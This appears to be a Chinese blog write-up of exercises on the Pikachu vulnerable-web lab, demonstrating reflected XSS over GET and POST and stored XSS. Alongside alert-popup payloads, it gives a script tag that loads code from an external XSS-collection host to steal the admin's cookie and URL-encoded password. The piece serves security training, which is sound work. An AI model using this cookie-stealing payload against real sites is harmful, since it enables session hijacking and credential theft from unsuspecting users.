pikachu反射型xss(get、post)、储存型xss

pikachu

反射型xss(get)

在message后输入

<a href="javascript:alert(1)">XSS Test</a>

即可在who is后面看到按钮:XSS Test,点击即可显示出alert的内容1;

反射型xss(post)

界面是输入用户名和密码,尝试将这两栏输入JavaScript弹窗命令,不论是只输入一个表单,还是两个都输入,都没有产生反应,按提示登录后,再尝试提交js的弹窗命令:

image-20220905193244370

发现了提交的request中有cookie,message依然是urlencode的js弹窗命令:image-20220905193420545

这次post提交就可以看到提交后可以看到弹框命令可以执行了:

image-20220905193729654

在XSS平台中截取下图黄色部分代码提交post请求,代码:

<sCRiPt sRC=//uj.ci/pl5C></sCrIpT>

image-20220905194946585

查看项目内容也一样得到cookie,cookie中的admin以及pw后的urlencode编码的密码就可以被盗取:

image-20220905195212291

储存型xss

提交js命令后依然可以弹出命令

储存型xss

提交js命令后依然可以弹出命令

image-20220905202606272

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值